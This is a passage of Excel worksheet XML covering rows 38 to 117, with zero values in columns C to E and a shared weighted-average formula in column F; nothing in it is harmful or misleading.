      <c r="B38" s="45"/>
      <c r="C38" s="14">
        <v>0</v>
      </c>
      <c r="D38" s="14">
        <v>0</v>
      </c>
      <c r="E38" s="14">
        <v>0</v>
      </c>
      <c r="F38" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A39" s="41"/>
      <c r="B39" s="45"/>
      <c r="C39" s="14">
        <v>0</v>
      </c>
      <c r="D39" s="14">
        <v>0</v>
      </c>
      <c r="E39" s="14">
        <v>0</v>
      </c>
      <c r="F39" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A40" s="41"/>
      <c r="B40" s="45"/>
      <c r="C40" s="14">
        <v>0</v>
      </c>
      <c r="D40" s="14">
        <v>0</v>
      </c>
      <c r="E40" s="14">
        <v>0</v>
      </c>
      <c r="F40" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A41" s="41"/>
      <c r="B41" s="45"/>
      <c r="C41" s="14">
        <v>0</v>
      </c>
      <c r="D41" s="14">
        <v>0</v>
      </c>
      <c r="E41" s="14">
        <v>0</v>
      </c>
      <c r="F41" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A42" s="41"/>
      <c r="B42" s="45"/>
      <c r="C42" s="14">
        <v>0</v>
      </c>
      <c r="D42" s="14">
        <v>0</v>
      </c>
      <c r="E42" s="14">
        <v>0</v>
      </c>
      <c r="F42" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A43" s="41"/>
      <c r="B43" s="45"/>
      <c r="C43" s="14">
        <v>0</v>
      </c>
      <c r="D43" s="14">
        <v>0</v>
      </c>
      <c r="E43" s="14">
        <v>0</v>
      </c>
      <c r="F43" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A44" s="41"/>
      <c r="B44" s="45"/>
      <c r="C44" s="14">
        <v>0</v>
      </c>
      <c r="D44" s="14">
        <v>0</v>
      </c>
      <c r="E44" s="14">
        <v>0</v>
      </c>
      <c r="F44" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A45" s="41"/>
      <c r="B45" s="45"/>
      <c r="C45" s="14">
        <v>0</v>
      </c>
      <c r="D45" s="14">
        <v>0</v>
      </c>
      <c r="E45" s="14">
        <v>0</v>
      </c>
      <c r="F45" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A46" s="41"/>
      <c r="B46" s="45"/>
      <c r="C46" s="14">
        <v>0</v>
      </c>
      <c r="D46" s="14">
        <v>0</v>
      </c>
      <c r="E46" s="14">
        <v>0</v>
      </c>
      <c r="F46" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A47" s="41"/>
      <c r="B47" s="45"/>
      <c r="C47" s="14">
        <v>0</v>
      </c>
      <c r="D47" s="14">
        <v>0</v>
      </c>
      <c r="E47" s="14">
        <v>0</v>
      </c>
      <c r="F47" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A48" s="41"/>
      <c r="B48" s="45"/>
      <c r="C48" s="14">
        <v>0</v>
      </c>
      <c r="D48" s="14">
        <v>0</v>
      </c>
      <c r="E48" s="14">
        <v>0</v>
      </c>
      <c r="F48" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A49" s="41"/>
      <c r="B49" s="45"/>
      <c r="C49" s="14">
        <v>0</v>
      </c>
      <c r="D49" s="14">
        <v>0</v>
      </c>
      <c r="E49" s="14">
        <v>0</v>
      </c>
      <c r="F49" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A50" s="41"/>
      <c r="B50" s="45"/>
      <c r="C50" s="14">
        <v>0</v>
      </c>
      <c r="D50" s="14">
        <v>0</v>
      </c>
      <c r="E50" s="14">
        <v>0</v>
      </c>
      <c r="F50" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A51" s="41"/>
      <c r="B51" s="45"/>
      <c r="C51" s="14">
        <v>0</v>
      </c>
      <c r="D51" s="14">
        <v>0</v>
      </c>
      <c r="E51" s="14">
        <v>0</v>
      </c>
      <c r="F51" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A52" s="41"/>
      <c r="B52" s="45"/>
      <c r="C52" s="14">
        <v>0</v>
      </c>
      <c r="D52" s="14">
        <v>0</v>
      </c>
      <c r="E52" s="14">
        <v>0</v>
      </c>
      <c r="F52" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A53" s="41"/>
      <c r="B53" s="45"/>
      <c r="C53" s="14">
        <v>0</v>
      </c>
      <c r="D53" s="14">
        <v>0</v>
      </c>
      <c r="E53" s="14">
        <v>0</v>
      </c>
      <c r="F53" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A54" s="41"/>
      <c r="B54" s="45"/>
      <c r="C54" s="14">
        <v>0</v>
      </c>
      <c r="D54" s="14">
        <v>0</v>
      </c>
      <c r="E54" s="14">
        <v>0</v>
      </c>
      <c r="F54" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A55" s="41"/>
      <c r="B55" s="45"/>
      <c r="C55" s="14">
        <v>0</v>
      </c>
      <c r="D55" s="14">
        <v>0</v>
      </c>
      <c r="E55" s="14">
        <v>0</v>
      </c>
      <c r="F55" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A56" s="41"/>
      <c r="B56" s="45"/>
      <c r="C56" s="14">
        <v>0</v>
      </c>
      <c r="D56" s="14">
        <v>0</v>
      </c>
      <c r="E56" s="14">
        <v>0</v>
      </c>
      <c r="F56" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A57" s="41"/>
      <c r="B57" s="45"/>
      <c r="C57" s="14">
        <v>0</v>
      </c>
      <c r="D57" s="14">
        <v>0</v>
      </c>
      <c r="E57" s="14">
        <v>0</v>
      </c>
      <c r="F57" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A58" s="41"/>
      <c r="B58" s="45"/>
      <c r="C58" s="14">
        <v>0</v>
      </c>
      <c r="D58" s="14">
        <v>0</v>
      </c>
      <c r="E58" s="14">
        <v>0</v>
      </c>
      <c r="F58" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A59" s="41"/>
      <c r="B59" s="45"/>
      <c r="C59" s="14">
        <v>0</v>
      </c>
      <c r="D59" s="14">
        <v>0</v>
      </c>
      <c r="E59" s="14">
        <v>0</v>
      </c>
      <c r="F59" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A60" s="41"/>
      <c r="B60" s="45"/>
      <c r="C60" s="14">
        <v>0</v>
      </c>
      <c r="D60" s="14">
        <v>0</v>
      </c>
      <c r="E60" s="14">
        <v>0</v>
      </c>
      <c r="F60" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A61" s="41"/>
      <c r="B61" s="45"/>
      <c r="C61" s="14">
        <v>0</v>
      </c>
      <c r="D61" s="14">
        <v>0</v>
      </c>
      <c r="E61" s="14">
        <v>0</v>
      </c>
      <c r="F61" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A62" s="41"/>
      <c r="B62" s="45"/>
      <c r="C62" s="14">
        <v>0</v>
      </c>
      <c r="D62" s="14">
        <v>0</v>
      </c>
      <c r="E62" s="14">
        <v>0</v>
      </c>
      <c r="F62" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A63" s="41"/>
      <c r="B63" s="45"/>
      <c r="C63" s="14">
        <v>0</v>
      </c>
      <c r="D63" s="14">
        <v>0</v>
      </c>
      <c r="E63" s="14">
        <v>0</v>
      </c>
      <c r="F63" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A64" s="41"/>
      <c r="B64" s="45"/>
      <c r="C64" s="14">
        <v>0</v>
      </c>
      <c r="D64" s="14">
        <v>0</v>
      </c>
      <c r="E64" s="14">
        <v>0</v>
      </c>
      <c r="F64" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A65" s="41"/>
      <c r="B65" s="45"/>
      <c r="C65" s="14">
        <v>0</v>
      </c>
      <c r="D65" s="14">
        <v>0</v>
      </c>
      <c r="E65" s="14">
        <v>0</v>
      </c>
      <c r="F65" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A66" s="41"/>
      <c r="B66" s="45"/>
      <c r="C66" s="14">
        <v>0</v>
      </c>
      <c r="D66" s="14">
        <v>0</v>
      </c>
      <c r="E66" s="14">
        <v>0</v>
      </c>
      <c r="F66" s="32">
        <f t="shared" ref="F66:F129" si="1">((C66*2)+D66+(E66*2))/5</f>
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A67" s="41"/>
      <c r="B67" s="45"/>
      <c r="C67" s="14">
        <v>0</v>
      </c>
      <c r="D67" s="14">
        <v>0</v>
      </c>
      <c r="E67" s="14">
        <v>0</v>
      </c>
      <c r="F67" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A68" s="41"/>
      <c r="B68" s="45"/>
      <c r="C68" s="14">
        <v>0</v>
      </c>
      <c r="D68" s="14">
        <v>0</v>
      </c>
      <c r="E68" s="14">
        <v>0</v>
      </c>
      <c r="F68" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A69" s="41"/>
      <c r="B69" s="45"/>
      <c r="C69" s="14">
        <v>0</v>
      </c>
      <c r="D69" s="14">
        <v>0</v>
      </c>
      <c r="E69" s="14">
        <v>0</v>
      </c>
      <c r="F69" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A70" s="41"/>
      <c r="B70" s="45"/>
      <c r="C70" s="14">
        <v>0</v>
      </c>
      <c r="D70" s="14">
        <v>0</v>
      </c>
      <c r="E70" s="14">
        <v>0</v>
      </c>
      <c r="F70" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A71" s="41"/>
      <c r="B71" s="45"/>
      <c r="C71" s="14">
        <v>0</v>
      </c>
      <c r="D71" s="14">
        <v>0</v>
      </c>
      <c r="E71" s="14">
        <v>0</v>
      </c>
      <c r="F71" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A72" s="41"/>
      <c r="B72" s="45"/>
      <c r="C72" s="14">
        <v>0</v>
      </c>
      <c r="D72" s="14">
        <v>0</v>
      </c>
      <c r="E72" s="14">
        <v>0</v>
      </c>
      <c r="F72" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A73" s="41"/>
      <c r="B73" s="45"/>
      <c r="C73" s="14">
        <v>0</v>
      </c>
      <c r="D73" s="14">
        <v>0</v>
      </c>
      <c r="E73" s="14">
        <v>0</v>
      </c>
      <c r="F73" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A74" s="41"/>
      <c r="B74" s="45"/>
      <c r="C74" s="14">
        <v>0</v>
      </c>
      <c r="D74" s="14">
        <v>0</v>
      </c>
      <c r="E74" s="14">
        <v>0</v>
      </c>
      <c r="F74" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="75" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A75" s="41"/>
      <c r="B75" s="45"/>
      <c r="C75" s="14">
        <v>0</v>
      </c>
      <c r="D75" s="14">
        <v>0</v>
      </c>
      <c r="E75" s="14">
        <v>0</v>
      </c>
      <c r="F75" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A76" s="41"/>
      <c r="B76" s="45"/>
      <c r="C76" s="14">
        <v>0</v>
      </c>
      <c r="D76" s="14">
        <v>0</v>
      </c>
      <c r="E76" s="14">
        <v>0</v>
      </c>
      <c r="F76" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A77" s="41"/>
      <c r="B77" s="45"/>
      <c r="C77" s="14">
        <v>0</v>
      </c>
      <c r="D77" s="14">
        <v>0</v>
      </c>
      <c r="E77" s="14">
        <v>0</v>
      </c>
      <c r="F77" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="78" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A78" s="41"/>
      <c r="B78" s="45"/>
      <c r="C78" s="14">
        <v>0</v>
      </c>
      <c r="D78" s="14">
        <v>0</v>
      </c>
      <c r="E78" s="14">
        <v>0</v>
      </c>
      <c r="F78" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="79" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A79" s="41"/>
      <c r="B79" s="45"/>
      <c r="C79" s="14">
        <v>0</v>
      </c>
      <c r="D79" s="14">
        <v>0</v>
      </c>
      <c r="E79" s="14">
        <v>0</v>
      </c>
      <c r="F79" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="80" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A80" s="41"/>
      <c r="B80" s="45"/>
      <c r="C80" s="14">
        <v>0</v>
      </c>
      <c r="D80" s="14">
        <v>0</v>
      </c>
      <c r="E80" s="14">
        <v>0</v>
      </c>
      <c r="F80" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="81" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A81" s="41"/>
      <c r="B81" s="45"/>
      <c r="C81" s="14">
        <v>0</v>
      </c>
      <c r="D81" s="14">
        <v>0</v>
      </c>
      <c r="E81" s="14">
        <v>0</v>
      </c>
      <c r="F81" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="82" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A82" s="41"/>
      <c r="B82" s="45"/>
      <c r="C82" s="14">
        <v>0</v>
      </c>
      <c r="D82" s="14">
        <v>0</v>
      </c>
      <c r="E82" s="14">
        <v>0</v>
      </c>
      <c r="F82" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="83" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A83" s="41"/>
      <c r="B83" s="45"/>
      <c r="C83" s="14">
        <v>0</v>
      </c>
      <c r="D83" s="14">
        <v>0</v>
      </c>
      <c r="E83" s="14">
        <v>0</v>
      </c>
      <c r="F83" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="84" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A84" s="41"/>
      <c r="B84" s="45"/>
      <c r="C84" s="14">
        <v>0</v>
      </c>
      <c r="D84" s="14">
        <v>0</v>
      </c>
      <c r="E84" s="14">
        <v>0</v>
      </c>
      <c r="F84" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="85" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A85" s="41"/>
      <c r="B85" s="45"/>
      <c r="C85" s="14">
        <v>0</v>
      </c>
      <c r="D85" s="14">
        <v>0</v>
      </c>
      <c r="E85" s="14">
        <v>0</v>
      </c>
      <c r="F85" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="86" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A86" s="41"/>
      <c r="B86" s="45"/>
      <c r="C86" s="14">
        <v>0</v>
      </c>
      <c r="D86" s="14">
        <v>0</v>
      </c>
      <c r="E86" s="14">
        <v>0</v>
      </c>
      <c r="F86" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="87" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A87" s="41"/>
      <c r="B87" s="45"/>
      <c r="C87" s="14">
        <v>0</v>
      </c>
      <c r="D87" s="14">
        <v>0</v>
      </c>
      <c r="E87" s="14">
        <v>0</v>
      </c>
      <c r="F87" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="88" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A88" s="41"/>
      <c r="B88" s="45"/>
      <c r="C88" s="14">
        <v>0</v>
      </c>
      <c r="D88" s="14">
        <v>0</v>
      </c>
      <c r="E88" s="14">
        <v>0</v>
      </c>
      <c r="F88" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A89" s="41"/>
      <c r="B89" s="45"/>
      <c r="C89" s="14">
        <v>0</v>
      </c>
      <c r="D89" s="14">
        <v>0</v>
      </c>
      <c r="E89" s="14">
        <v>0</v>
      </c>
      <c r="F89" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="90" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A90" s="41"/>
      <c r="B90" s="45"/>
      <c r="C90" s="14">
        <v>0</v>
      </c>
      <c r="D90" s="14">
        <v>0</v>
      </c>
      <c r="E90" s="14">
        <v>0</v>
      </c>
      <c r="F90" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="91" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A91" s="41"/>
      <c r="B91" s="45"/>
      <c r="C91" s="14">
        <v>0</v>
      </c>
      <c r="D91" s="14">
        <v>0</v>
      </c>
      <c r="E91" s="14">
        <v>0</v>
      </c>
      <c r="F91" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A92" s="41"/>
      <c r="B92" s="45"/>
      <c r="C92" s="14">
        <v>0</v>
      </c>
      <c r="D92" s="14">
        <v>0</v>
      </c>
      <c r="E92" s="14">
        <v>0</v>
      </c>
      <c r="F92" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="93" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A93" s="41"/>
      <c r="B93" s="45"/>
      <c r="C93" s="14">
        <v>0</v>
      </c>
      <c r="D93" s="14">
        <v>0</v>
      </c>
      <c r="E93" s="14">
        <v>0</v>
      </c>
      <c r="F93" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A94" s="41"/>
      <c r="B94" s="45"/>
      <c r="C94" s="14">
        <v>0</v>
      </c>
      <c r="D94" s="14">
        <v>0</v>
      </c>
      <c r="E94" s="14">
        <v>0</v>
      </c>
      <c r="F94" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A95" s="41"/>
      <c r="B95" s="45"/>
      <c r="C95" s="14">
        <v>0</v>
      </c>
      <c r="D95" s="14">
        <v>0</v>
      </c>
      <c r="E95" s="14">
        <v>0</v>
      </c>
      <c r="F95" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="96" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A96" s="41"/>
      <c r="B96" s="45"/>
      <c r="C96" s="14">
        <v>0</v>
      </c>
      <c r="D96" s="14">
        <v>0</v>
      </c>
      <c r="E96" s="14">
        <v>0</v>
      </c>
      <c r="F96" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="97" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A97" s="41"/>
      <c r="B97" s="45"/>
      <c r="C97" s="14">
        <v>0</v>
      </c>
      <c r="D97" s="14">
        <v>0</v>
      </c>
      <c r="E97" s="14">
        <v>0</v>
      </c>
      <c r="F97" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="98" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A98" s="41"/>
      <c r="B98" s="45"/>
      <c r="C98" s="14">
        <v>0</v>
      </c>
      <c r="D98" s="14">
        <v>0</v>
      </c>
      <c r="E98" s="14">
        <v>0</v>
      </c>
      <c r="F98" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A99" s="41"/>
      <c r="B99" s="45"/>
      <c r="C99" s="14">
        <v>0</v>
      </c>
      <c r="D99" s="14">
        <v>0</v>
      </c>
      <c r="E99" s="14">
        <v>0</v>
      </c>
      <c r="F99" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A100" s="41"/>
      <c r="B100" s="45"/>
      <c r="C100" s="14">
        <v>0</v>
      </c>
      <c r="D100" s="14">
        <v>0</v>
      </c>
      <c r="E100" s="14">
        <v>0</v>
      </c>
      <c r="F100" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="101" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A101" s="41"/>
      <c r="B101" s="45"/>
      <c r="C101" s="14">
        <v>0</v>
      </c>
      <c r="D101" s="14">
        <v>0</v>
      </c>
      <c r="E101" s="14">
        <v>0</v>
      </c>
      <c r="F101" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A102" s="41"/>
      <c r="B102" s="45"/>
      <c r="C102" s="14">
        <v>0</v>
      </c>
      <c r="D102" s="14">
        <v>0</v>
      </c>
      <c r="E102" s="14">
        <v>0</v>
      </c>
      <c r="F102" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="103" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A103" s="41"/>
      <c r="B103" s="45"/>
      <c r="C103" s="14">
        <v>0</v>
      </c>
      <c r="D103" s="14">
        <v>0</v>
      </c>
      <c r="E103" s="14">
        <v>0</v>
      </c>
      <c r="F103" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A104" s="41"/>
      <c r="B104" s="45"/>
      <c r="C104" s="14">
        <v>0</v>
      </c>
      <c r="D104" s="14">
        <v>0</v>
      </c>
      <c r="E104" s="14">
        <v>0</v>
      </c>
      <c r="F104" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="105" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A105" s="41"/>
      <c r="B105" s="45"/>
      <c r="C105" s="14">
        <v>0</v>
      </c>
      <c r="D105" s="14">
        <v>0</v>
      </c>
      <c r="E105" s="14">
        <v>0</v>
      </c>
      <c r="F105" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="106" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A106" s="41"/>
      <c r="B106" s="45"/>
      <c r="C106" s="14">
        <v>0</v>
      </c>
      <c r="D106" s="14">
        <v>0</v>
      </c>
      <c r="E106" s="14">
        <v>0</v>
      </c>
      <c r="F106" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="107" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A107" s="41"/>
      <c r="B107" s="45"/>
      <c r="C107" s="14">
        <v>0</v>
      </c>
      <c r="D107" s="14">
        <v>0</v>
      </c>
      <c r="E107" s="14">
        <v>0</v>
      </c>
      <c r="F107" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="108" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A108" s="41"/>
      <c r="B108" s="45"/>
      <c r="C108" s="14">
        <v>0</v>
      </c>
      <c r="D108" s="14">
        <v>0</v>
      </c>
      <c r="E108" s="14">
        <v>0</v>
      </c>
      <c r="F108" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="109" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A109" s="41"/>
      <c r="B109" s="45"/>
      <c r="C109" s="14">
        <v>0</v>
      </c>
      <c r="D109" s="14">
        <v>0</v>
      </c>
      <c r="E109" s="14">
        <v>0</v>
      </c>
      <c r="F109" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="110" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A110" s="41"/>
      <c r="B110" s="45"/>
      <c r="C110" s="14">
        <v>0</v>
      </c>
      <c r="D110" s="14">
        <v>0</v>
      </c>
      <c r="E110" s="14">
        <v>0</v>
      </c>
      <c r="F110" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="111" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A111" s="41"/>
      <c r="B111" s="45"/>
      <c r="C111" s="14">
        <v>0</v>
      </c>
      <c r="D111" s="14">
        <v>0</v>
      </c>
      <c r="E111" s="14">
        <v>0</v>
      </c>
      <c r="F111" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="112" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A112" s="41"/>
      <c r="B112" s="45"/>
      <c r="C112" s="14">
        <v>0</v>
      </c>
      <c r="D112" s="14">
        <v>0</v>
      </c>
      <c r="E112" s="14">
        <v>0</v>
      </c>
      <c r="F112" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="113" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A113" s="41"/>
      <c r="B113" s="45"/>
      <c r="C113" s="14">
        <v>0</v>
      </c>
      <c r="D113" s="14">
        <v>0</v>
      </c>
      <c r="E113" s="14">
        <v>0</v>
      </c>
      <c r="F113" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="114" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A114" s="41"/>
      <c r="B114" s="45"/>
      <c r="C114" s="14">
        <v>0</v>
      </c>
      <c r="D114" s="14">
        <v>0</v>
      </c>
      <c r="E114" s="14">
        <v>0</v>
      </c>
      <c r="F114" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="115" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A115" s="41"/>
      <c r="B115" s="45"/>
      <c r="C115" s="14">
        <v>0</v>
      </c>
      <c r="D115" s="14">
        <v>0</v>
      </c>
      <c r="E115" s="14">
        <v>0</v>
      </c>
      <c r="F115" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="116" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A116" s="41"/>
      <c r="B116" s="45"/>
      <c r="C116" s="14">
        <v>0</v>
      </c>
      <c r="D116" s="14">
        <v>0</v>
      </c>
      <c r="E116" s="14">
        <v>0</v>
      </c>
      <c r="F116" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="117" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A117" s="41"/>
      <c r="B117" s="45"/>
      <c r="C117" s="14">
        <v>0</v>
      </c>
      <c r="D117" s="14">
        <v>0</v>
      </c>
      <c r="E117" s="14">
        <v>0</v>
      </c>
      <c r="F117" s="32">
